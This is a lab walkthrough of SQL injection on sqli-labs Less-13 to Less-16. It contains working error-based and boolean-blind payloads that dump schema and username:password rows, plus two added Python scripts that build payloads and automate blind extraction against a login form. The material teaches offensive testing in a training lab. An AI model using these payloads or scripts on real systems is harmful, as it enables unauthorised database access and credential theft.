Less-13

Entering username=1', password=2' produced no reaction; entering username=1", password=2" produced an error.

(screenshot: the MySQL error message)

The error message shows the input is wrapped in ('...'), so the closure is '). Once the quote is closed, statements such as order by 1 give no echo: this login page only reports success or failure and never prints query results, so a plain union has nowhere to display its columns. Use error-based injection instead and read the data out of the MySQL error message. The trick used below groups information_schema.tables by concat(<value>, floor(rand(0)*2)); because rand(0) is seeded, the group key is recomputed inconsistently while MySQL fills the group-by temporary table, and it raises a duplicate-entry error whose message contains <value> followed by a trailing 0 or 1.

1') union (select count(*) from information_schema.tables group by concat((select database()),floor(rand(0)*2)))#

The injection errors out (the two SELECTs in the union have a different number of columns), which shows the original query selects more than one column, so add a padding column:

1') union select 1,(select count(*) from information_schema.tables group by concat((select database()),floor(rand(0)*2)))#
(screenshot: Duplicate entry 'security1' ...)

This leaks the current database, "security"; the rest is routine.

Dump the tables

1') union select 1,(select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)))#
(screenshot: first table name)
1') union select 1,(select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2)))#
(screenshots: the remaining table names)

Changing the limit offset dumps every table one at a time (the last screenshot shows all of them; the later steps work the same way).

Dump the columns

1') union select 1,(select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),floor(rand(0)*2)))#
(screenshot: first column name of users)

Dump the data

1') union select 1,(select concat(username,0x3a,password) from security.users limit 0,1) as a group by... (see the working payload below; 0x3a is ':' and joins the two columns so one error leaks both)

1') union select 1,(select count(*) from information_schema.tables group by concat((select concat(username,0x3a,password) from security.users limit 0,1),floor(rand(0)*2)))#
(screenshot: username:password of the first row)
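The payloads above all follow one template: a closing string, a padding column, and the floor(rand(0)*2) group-by wrapped around a scalar subquery, with the leaked value read back from the duplicate-entry error. The following script is an added example, not code from the original post, that generates those payloads for Less-13 (close "1')") and Less-14 (close '1"') and parses the value out of a MySQL error. Everything in it is assumed from the payloads on the page; the error texts it handles are constructed samples in the form the screenshots show.

```python
import re

# The error the floor(rand(0)*2) trick provokes, e.g.
# "Duplicate entry 'security1' for key 'group_key'"; MySQL 8 prints '<group_key>'
# and both forms match this pattern.
DUP_ENTRY = re.compile(r"Duplicate entry '(.*)' for key '")


def error_payload(subquery, close="1')", pad_columns=1):
    """Build the page's error-based payload around one scalar subquery.

    close       - string that closes the original quoting: "1')" for Less-13,
                  '1"' for Less-14
    pad_columns - literal columns placed before the subquery so the UNION has the
                  same column count as the original SELECT (Less-13 needs one)
    """
    pad = "".join(f"{i}," for i in range(1, pad_columns + 1))
    return (
        f"{close} union select {pad}(select count(*) from information_schema.tables "
        f"group by concat(({subquery}),floor(rand(0)*2)))#"
    )


def table_subquery(index):
    """The index-th table of the current database; bump index to walk the list."""
    return (
        "select table_name from information_schema.tables "
        f"where table_schema=database() limit {index},1"
    )


def column_subquery(schema, table, index):
    """The index-th column of schema.table."""
    return (
        "select column_name from information_schema.columns "
        f"where table_schema='{schema}' and table_name='{table}' limit {index},1"
    )


def row_subquery(schema, table, columns, index):
    """Join several columns of one row with ':' (0x3a) so a single error leaks them all."""
    return f"select concat({',0x3a,'.join(columns)}) from {schema}.{table} limit {index},1"


def leaked_value(error_text):
    """Return the duplicated group key minus its trailing floor(rand(0)*2) digit,
    or None when the response carries no duplicate-entry error.

    Caveat: MySQL shortens very long key values in this message, so dump long
    strings in pieces (mid()) rather than trusting one error to carry all of it.
    """
    m = DUP_ENTRY.search(error_text)
    if not m:
        return None
    return m.group(1)[:-1]


if __name__ == "__main__":
    print(error_payload("select database()"))
    print(error_payload(table_subquery(0)))
    print(error_payload(row_subquery("security", "users", ["username", "password"], 0)))
    # Constructed error text in the form the page's screenshots show.
    print(leaked_value("Duplicate entry 'security1' for key 'group_key'"))
```

Paste the printed payload into the password field; the response's error line goes through leaked_value(), and increasing the index walks through tables, columns and rows exactly as the manual payloads above do.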

Less-14

Entering username=1', password=2' produced no reaction; entering username=1", password=2" produced an error.

(screenshot: the MySQL error message)

So the closure here is a double quote. The payload 2" or 1=1 # logs in, and testing shows the level is solved exactly like Less-13: reuse the same error-based payloads with 1" in place of 1') at the front.

Less-15

Entering username=1', password=2' produced no reaction; entering username=1", password=2" produced no reaction either...

Errors are probably no longer displayed. Trying password=1' or 1=1 # logs in successfully...

Since the WHERE clause is username=... and password=..., a payload of the form 1' or <condition> # makes the login succeed exactly when <condition> is true. That turns the success/failure page into a boolean oracle: boolean-based blind injection.

Dump the database:

1' or (left((select database()),1)='s')#

Each confirmed character extends the prefix (left(...,2)='se', and so on). Note that MySQL's default collations compare case-insensitively, so lowercase guesses are enough. See my earlier post for boolean-based injection in detail; the candidate characters can be brute-forced with Burp Suite's Intruder.

Dump the tables

1' or left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e'#

Less-16

Entering username=1', password=2' fails to log in; entering username=1", password=2" fails to log in...

Errors are probably not displayed. Trying password=1' or 1=1 # fails; password=1" or 1=1 # fails...

Continuing with password=1") or 1=1 # succeeds, at last...

From here on it is the same as Less-15, with 1") in place of 1' at the front of every payload.
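Less-15 and Less-16 differ only in the closing string, so the character-by-character left() test is worth scripting instead of driving it through Burp. The script below is an added example, not code from the original post: blind_extract() grows the prefix one character at a time through a caller-supplied oracle; http_oracle() talks to a live sqli-labs form (the field names uname/passwd/submit and the flag.jpg success marker are assumptions about that lab); simulated_oracle() is a constructed offline stand-in that answers the left() comparison the way MySQL would, so the extractor can be run without a target.

```python
import re
import string
import urllib.parse
import urllib.request

# Lowercase is enough: MySQL's default collations compare case-insensitively,
# so 'Dumb' comes back as 'dumb'. Widen this if results look cut short.
CHARSET = string.ascii_lowercase + string.digits + "_"


def blind_extract(oracle, subquery, close="1'", max_len=64, charset=CHARSET):
    """Recover the string a scalar subquery returns, one character at a time.

    oracle(payload) returns True when the login succeeds for that password.
    close is "1'" for Less-15 and '1")' for Less-16.
    """
    found = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            candidate = found + ch
            payload = f"{close} or left(({subquery}),{pos})='{candidate}'#"
            if oracle(payload):
                found = candidate
                break
        else:
            # No candidate matched: the string ended, or it contains a
            # character outside `charset`.
            break
    return found


def http_oracle(url, success_marker=b"flag.jpg", username="1"):
    """Oracle for a live sqli-labs login form (assumed field names and marker)."""
    def oracle(payload):
        data = urllib.parse.urlencode(
            {"uname": username, "passwd": payload, "submit": "Submit"}).encode()
        with urllib.request.urlopen(url, data=data, timeout=10) as resp:
            return success_marker in resp.read()
    return oracle


def simulated_oracle(answers):
    """Constructed stand-in: answers maps a subquery to the value the database
    would return. Evaluates left((subquery),n)='prefix' like MySQL does
    (case-insensitive, left() never pads past the end of the string)."""
    pat = re.compile(r"^(.*) or left\(\((.*)\),(\d+)\)='(.*)'#$")

    def oracle(payload):
        m = pat.match(payload)
        if not m:
            return False
        subquery, n, prefix = m.group(2), int(m.group(3)), m.group(4)
        value = answers.get(subquery)
        if value is None:
            return False
        return value[:n].lower() == prefix.lower()
    return oracle


if __name__ == "__main__":
    fake = simulated_oracle({"select database()": "security"})
    print(blind_extract(fake, "select database()"))
    # Against a real lab instance (URL assumed):
    # live = http_oracle("http://127.0.0.1/sqli-labs/Less-15/")
    # print(blind_extract(live, "select database()"))
```

Swap in the table, column and row subqueries from the Less-13 section as the subquery argument to walk the schema; each call costs at most len(charset) requests per character, which is why the charset is kept small.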
